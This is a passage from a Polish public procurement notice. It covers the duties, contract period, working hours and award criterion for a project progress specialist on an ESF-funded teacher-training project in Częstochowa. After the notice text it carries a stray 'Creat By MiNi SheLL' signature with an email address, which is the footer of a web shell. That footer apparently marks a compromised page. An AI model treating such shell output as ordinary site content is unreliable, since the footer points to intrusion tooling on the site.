b.	monitoring rzeczowy rezultatów - zgodność realizacji projektu z planem merytorycznym ;monitoring 	 	dokumentacji szkoleniowej: harmonogramy szkoleń, monitoring obecności uczestników-czek i sporządzanie zestawień zbiorczych;
c.	ocena skuteczności dydaktycznej zajęć i konsultacji prowadzonych przez trenerów;
d.	sprawdzanie kart czasu pracy trenerów prowadzących zajęcia;
e.	opracowanie planu konferencji i przygotowanie przerw kawowych podczas konferencji;
f.	ewaluacja wewnętrzna projektu ,przygotowanie pytań ankietowych oraz zestawienie wyników ankiet 	ewaluacyjnych online na rozpoczęcie i zakończenie szkolenia, monitoring ewaluacji wewnętrznej  prowadzonej przez trenerów;
g.	pozyskanie danych osobowych uczestników projektu w zakresie przewidzianym w formularzu PEFS oraz oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie; 
h.	wnioski o płatność w zakresie wypełniania formularza PEFS;
i.	nadzór nad bezpieczeństwem danych osobowych uczestników-czek projektu zgodnie z przepisami prawa;
j.	  przygotowanie harmonogramu cyklu szkoleń; 
k.	pomoc w rekrutacji;
l.	  przygotowanie sali dydaktycznej , informatycznej dla uczestników-czek projektu oraz auli na potrzeby  konferencji;
m.	promocja projektu; 
n.	działania wspierające koordynatora-kę i asystenta-kę projektu w organizacji konferencji;
o.	obsługa spotkań zespołu projektowego wg ustalonego harmonogramu;
p.	obsługa konferencji - drukowanie i dostarczanie materiałów szkoleniowych oraz dokumentów potwierdzających realizację projektu, tj. list obecności, deklaracji uczestnictwa, itp.;
q.	przygotowanie zestawu materiałów szkoleniowych i edukacyjnych dla uczestników/czek;
r.	wykonywanie prac administracyjnych w Biurze Projektu, w tym obsługa urządzeń biurowych;
s.	przygotowywanie i gromadzenie dokumentacji szkoleń w celu jej archiwizacji;
t.	  bieżący kontakt z uczestnikami projektu;
u.	współpraca z Wydawnictwem RODN WOM w Częstochowie;
v.	przygotowanie zapotrzebowań dotyczących zakupów na potrzeby projektu oraz wnioskowanie o rozpoczęcie procedury przetargowej;
w.	współpraca z zespołem projektowym w celu realizacji planowanych działań i osiągnięcia 	zamierzonych rezultatów;
x.	współpraca z koordynatorem-ką projektu w celu zapewnienia prawidłowego przepływu informacji;
y.	dokumentowanie przebiegu i wyników pracy własnej;
z)	uczestniczenie oraz sporządzanie notatek ze spotkań zespołu projektowego.
C.	Wykonawca zatrudniony będzie na podstawie umowy zlecenia w terminie od podpisania umowy do 30.06.2014 r.
D.	Łączny wymiar zaangażowania specjalisty-tki ds. postępu rzeczowego w realizację zadań we wszystkich projektach POKL nie może przekraczać 240 godzin miesięcznie, łącznie z zaangażowaniem do niniejszego projektu 80 godzin miesięcznie.
E.	Zamawiający wymaga, aby co najmniej 20 godzin w miesiącu ,pn - pt, usługa była świadczona w biurze projektu Regionalnego Ośrodka Doskonalenia Nauczycieli WOM w Częstochowie przy Al. Jana Pawła II 126;130 w godzinach popołudniowych ,15.00 - 17.00.
F.	W przypadku wykonania pilnych zadań wynikających z harmonogramu istnieje możliwość świadczenia 	usługi również w soboty, w godzinach wcześniej ustalonych z Zamawiającym.
G.	Specjalista ds. postępu rzeczowego nie może być  zatrudniony-a w instytucji uczestniczącej w realizacji POKL na podstawie stosunku pracy, chyba, że nie zachodzi konflikt interesów lub podwójne finansowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com